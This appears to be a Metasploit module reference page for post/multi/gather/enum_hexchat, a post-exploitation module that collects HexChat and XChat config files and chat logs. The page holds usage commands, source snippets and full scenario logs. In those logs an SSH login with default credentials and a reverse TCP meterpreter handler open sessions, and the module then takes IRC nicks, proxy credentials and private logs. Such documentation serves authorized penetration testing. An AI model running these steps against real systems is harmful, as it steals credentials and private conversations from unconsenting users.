Linux Gather HexChat/XChat Enumeration - Metasploit
This page contains detailed information about how to use the post/multi/gather/enum_hexchat metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Linux Gather HexChat/XChat Enumeration
Module: post/multi/gather/enum_hexchat
Source code: modules/post/multi/gather/enum_hexchat.rb
Disclosure date: -
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will collect HexChat and XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/multi/gather/enum_hexchat
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/multi/gather/enum_hexchat
msf post(enum_hexchat) > show options
... show and set options ...
msf post(enum_hexchat) > set SESSION session-id
msf post(enum_hexchat) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/multi/gather/enum_hexchat")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This module enumerates the config and log files for XChat and HexChat. XChat was retired in 2015, although the site and downloads are still available in April 2020. It was forked and replaced by HexChat.
Linux xchat path:
/home/[username]/.xchat2/
* /home/[username]/.xchat2/servlist_.conf
* /home/[username]/.xchat2/xchat.conf
* /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log
Linux hexchat path:
/home/[username]/.config/hexchat/
* /home/[username]/.config/hexchat/servlist.conf
* /home/[username]/.config/hexchat/hexchat.conf
* /home/[username]/.config/hexchat/logs/FreeNode/Freenode-#aha.log
Verification Steps
- Install the application(s)
- Start msfconsole
- Get a shell
- Do:
use post/multi/gather/enum_hexchat
- Do:
set session #
- Do:
run
- You should get config and log files depending on your action
Actions
ALL
Download both config and chat logs. Default.
CHATS
Only download the chat logs.
CONFIGS
Only download teh config files.
Options
HEXCHAT
Gather the files from HexChat. Default true
.
XCHAT
Gather the files from XCHat. Default false
.
Scenarios
Hexchat 2.14.3 on Fedora 31
[*] Processing xchat.rb for ERB directives.
resource (xchat.rb)> use auxiliary/scanner/ssh/ssh_login
resource (xchat.rb)> set username fedora
username => fedora
resource (xchat.rb)> set password fedora
password => fedora
resource (xchat.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (xchat.rb)> run
[+] 2.2.2.2:22 - Success: 'fedora:fedora' ''
[*] Command shell session 1 opened (1.1.1.1:40023 -> 2.2.2.2:22) at 2020-04-22 07:17:59 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (xchat.rb)> use post/linux/gather/enum_hexchat
resource (xchat.rb)> set session -1
session => -1
resource (xchat.rb)> set verbose true
verbose => true
resource (xchat.rb)> run
[!] SESSION may not be compatible with this module.
[*] Detcted username: fedora
[+] Downloading: /home/fedora/.config/hexchat/servlist.conf
[+] Downloading: /home/fedora/.config/hexchat/hexchat.conf
[+] IRC nick: test14123251232151
[+] IRC nick1: test1251212123151
[+] IRC nick2: test123123123
[+] IRC nick3: test321321321
[+] Proxy conf: 1.1.1.1:9999 -> proxyusername/proxypass
[*] Downloading: /home/fedora/.config/hexchat//logs/freenode/freenode.log
[*] Downloading: /home/fedora/.config/hexchat//logs/freenode/#postgresql.log
[*] Downloading: /home/fedora/.config/hexchat//logs/freenode/#python-unregistered.log
[*] Downloading: /home/fedora/.config/hexchat//logs/freenode/server.log
[*] Downloading: /home/fedora/.config/hexchat//logs/NETWORK/server.log
[+] servlist.conf saved as /home/h00die/.msf4/loot/20200422071815_default_2.2.2.2_hexchat.config_359863.txt
[+] hexchat.conf saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.config_347758.txt
[+] freenode.log saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.chatlogs_364082.txt
[+] #postgresql.log saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.chatlogs_991489.txt
[+] #python-unregistered.log saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.chatlogs_760685.txt
[+] server.log saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.chatlogs_022702.txt
[+] server.log saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.chatlogs_433357.txt
[*] Post module execution completed
Hexchat 2.14.2 and XChat 2.8.9 on Windows 10
[*] Processing xchat_win.rb for ERB directives.
resource (xchat_win.rb)> use exploit/multi/handler
resource (xchat_win.rb)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (xchat_win.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (xchat_win.rb)> set lport 8888
lport => 8888
resource (xchat_win.rb)> run
[*] Started reverse TCP handler on 1.1.1.1:8888
[*] Sending stage (180291 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:8888 -> 3.3.3.3:51475) at 2020-04-22 10:30:29 -0400
meterpreter > background
[*] Backgrounding session 1...
resource (xchat_win.rb)> use post/multi/gather/enum_hexchat
resource (xchat_win.rb)> set session -1
session => -1
resource (xchat_win.rb)> set xchat true
xchat => true
resource (xchat_win.rb)> set verbose true
verbose => true
msf5 post(multi/gather/enum_hexchat) > rexploit
[*] Reloading module...
[!] SESSION may not be compatible with this module.
[+] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\servlist_.conf
[+] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\xchat.conf
[+] IRC nick: IEUser
[+] IRC nick1: IEUser
[+] IRC nick2: IEUser_
[+] IRC nick3: IEUser__
[*] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-#xchat.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-ChatJunkies.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-server.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\NETWORK-server.log
[+] servlist_.conf saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.config_408737.txt
[+] xchat.conf saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.config_505296.txt
[+] C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-#xchat.log saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.chatlogs_472281.txt
[+] C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-.log saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.chatlogs_133017.txt
[+] C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-ChatJunkies.log saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.chatlogs_238039.txt
[+] C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-server.log saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.chatlogs_482558.txt
[+] C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\NETWORK-server.log saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.chatlogs_379409.txt
[+] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\servlist.conf
[+] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\hexchat.conf
[+] IRC nick: IEUser
[+] IRC nick1: IEUser
[+] IRC nick2: IEUser_
[+] IRC nick3: IEUser__
[*] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\#python-unregistered.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\freenode.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\server.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\\logs\NETWORK\server.log
[+] servlist.conf saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.config_618512.txt
[+] hexchat.conf saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.config_765571.txt
[+] C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\#python-unregistered.log saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.chatlogs_007334.txt
[+] C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\.log saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.chatlogs_199140.txt
[+] C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\freenode.log saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.chatlogs_988553.txt
[+] C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\server.log saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.chatlogs_851506.txt
[+] C:\Users\IEUser\AppData\Roaming\HexChat\\logs\NETWORK\server.log saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.chatlogs_819165.txt
[*] Post module execution completed
Go back to menu.
Msfconsole Usage
Here is how the multi/gather/enum_hexchat post exploitation module looks in the msfconsole:
msf6 > use post/multi/gather/enum_hexchat
msf6 post(multi/gather/enum_hexchat) > show info
Name: Linux Gather HexChat/XChat Enumeration
Module: post/multi/gather/enum_hexchat
Platform: Linux
Arch:
Rank: Normal
Provided by:
sinn3r <[email protected]>
h00die
Compatible session types:
Meterpreter
Shell
Available actions:
Name Description
---- -----------
ALL Collect both the configs and chat logs
CHATS Collect chat logs with a pattern
CONFIGS Collect config files
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEXCHAT true no Enumerate hexchat
SESSION yes The session to run this module on.
XCHAT false no Enumerate xchat
Description:
This module will collect HexChat and XChat's config files and chat
logs from the victim's machine. There are three actions you may
choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to
collect information such as channel settings, channel/server
passwords, etc. The CHATS option will simply download all the .log
files.
References:
https://hexchat.readthedocs.io/en/latest/settings.html
Module Options
This is a complete list of options available in the multi/gather/enum_hexchat post exploitation module:
msf6 post(multi/gather/enum_hexchat) > show options
Module options (post/multi/gather/enum_hexchat):
Name Current Setting Required Description
---- --------------- -------- -----------
HEXCHAT true no Enumerate hexchat
SESSION yes The session to run this module on.
XCHAT false no Enumerate xchat
Post action:
Name Description
---- -----------
ALL Collect both the configs and chat logs
Advanced Options
Here is a complete list of advanced options supported by the multi/gather/enum_hexchat post exploitation module:
msf6 post(multi/gather/enum_hexchat) > show advanced
Module advanced options (post/multi/gather/enum_hexchat):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the multi/gather/enum_hexchat module can do:
msf6 post(multi/gather/enum_hexchat) > show actions
Post actions:
Name Description
---- -----------
ALL Collect both the configs and chat logs
CHATS Collect chat logs with a pattern
CONFIGS Collect config files
Evasion Options
Here is the full list of possible evasion options supported by the multi/gather/enum_hexchat post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(multi/gather/enum_hexchat) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Unable to get username.
Here is a relevant code snippet related to the "Unable to get username." error message:
63: elsif datastore['XCHAT']
64: paths << "#{appdata}\\X-Chat 2\\"
65: end
66: else
67: user = whoami
68: fail_with(Failure::Unknown, 'Unable to get username.') if user.blank?
69: vprint_status("Detcted username: #{user}")
70:
71: if mode == 'HEXCHAT'
72: # https://hexchat.readthedocs.io/en/latest/settings.html
73: paths << "/home/#{user}/.config/hexchat/"
Invalid mode: <MODE>
Here is a relevant code snippet related to the "Invalid mode: <MODE>" error message:
132: when 'XCHAT'
133: base_logs = "#{base}#{sep}xchatlogs"
134: when 'HEXCHAT'
135: base_logs = "#{base}#{sep}logs"
136: else
137: vprint_error("Invalid mode: #{mode}")
138: return logs
139: end
140: unless directory? base_logs
141: vprint_error("Chat logs not found at #{base_logs}")
142: return logs
Chat logs not found at <BASE_LOGS>
Here is a relevant code snippet related to the "Chat logs not found at <BASE_LOGS>" error message:
136: else
137: vprint_error("Invalid mode: #{mode}")
138: return logs
139: end
140: unless directory? base_logs
141: vprint_error("Chat logs not found at #{base_logs}")
142: return logs
143: end
144: list_logs(base_logs, mode).each do |l|
145: vprint_status("Downloading: #{l}")
146: data = read_file(l)
File not found: <CONF>
Here is a relevant code snippet related to the "File not found: <CONF>" error message:
200: files = ['servlist.conf', 'hexchat.conf']
201: end
202: files.each do |f|
203: conf = base + f
204: unless file? conf
205: vprint_error("File not found: #{conf}")
206: next
207: end
208: vprint_good("Downloading: #{conf}")
209: buf = read_file(conf)
210: next if buf.blank?
Please specify an action.
Here is a relevant code snippet related to the "Please specify an action." error message:
220:
221: config
222: end
223:
224: def run
225: fail_with(Failure::BadConfig, 'Please specify an action.') if action.nil?
226:
227: if datastore['XCHAT']
228: get_paths('XCHAT').each do |base|
229: unless directory? base
230: print_error("XChat not installed or used by user. #{base} not found.")
XChat not installed or used by user. <BASE> not found.
Here is a relevant code snippet related to the "XChat not installed or used by user. <BASE> not found." error message:
225: fail_with(Failure::BadConfig, 'Please specify an action.') if action.nil?
226:
227: if datastore['XCHAT']
228: get_paths('XCHAT').each do |base|
229: unless directory? base
230: print_error("XChat not installed or used by user. #{base} not found.")
231: end
232:
233: configs = get_configs(base, 'XCHAT') if action.name =~ /ALL|CONFIGS/i
234: chatlogs = get_chatlogs(base, 'XCHAT') if action.name =~ /ALL|CHATS/i
235:
HexChat not installed or used by user. <BASE> not found.
Here is a relevant code snippet related to the "HexChat not installed or used by user. <BASE> not found." error message:
239: end
240:
241: if datastore['HEXCHAT']
242: get_paths.each do |base|
243: unless directory? base
244: print_error("HexChat not installed or used by user. #{base} not found.")
245: end
246:
247: configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i
248: chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i
249:
Go back to menu.
Related Pull Requests
- #14226 Merged Pull Request: convert myworkspace.id to myworkspace_id for no db compat
- #13306 Merged Pull Request: enum_xchat updates and upgrades
References
See Also
Check also the following modules related to this module:
- post/multi/gather/apple_ios_backup
- post/multi/gather/aws_ec2_instance_metadata
- post/multi/gather/aws_keys
- post/multi/gather/check_malware
- post/multi/gather/chrome_cookies
- post/multi/gather/dbvis_enum
- post/multi/gather/dns_bruteforce
- post/multi/gather/dns_reverse_lookup
- post/multi/gather/dns_srv_lookup
- post/multi/gather/docker_creds
- post/multi/gather/enum_software_versions
- post/multi/gather/enum_vbox
- post/multi/gather/env
- post/multi/gather/fetchmailrc_creds
- post/multi/gather/filezilla_client_cred
- post/multi/gather/find_vmx
- post/multi/gather/firefox_creds
- post/multi/gather/gpg_creds
- post/multi/gather/grub_creds
- post/multi/gather/irssi_creds
- post/multi/gather/jboss_gather
- post/multi/gather/jenkins_gather
- post/multi/gather/lastpass_creds
- post/multi/gather/maven_creds
- post/multi/gather/multi_command
- post/multi/gather/netrc_creds
- post/multi/gather/pgpass_creds
- post/multi/gather/pidgin_cred
- post/multi/gather/ping_sweep
- post/multi/gather/remmina_creds
- post/multi/gather/resolve_hosts
- post/multi/gather/rsyncd_creds
- post/multi/gather/rubygems_api_key
- post/multi/gather/run_console_rc_file
- post/multi/gather/saltstack_salt
- post/multi/gather/skype_enum
- post/multi/gather/ssh_creds
- post/multi/gather/thunderbird_creds
- post/multi/gather/tomcat_gather
- post/multi/gather/ubiquiti_unifi_backup
- post/multi/gather/unix_cached_ad_hashes
- post/multi/gather/unix_kerberos_tickets
- post/multi/gather/wlan_geolocate
Authors
- sinn3r
- h00die
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.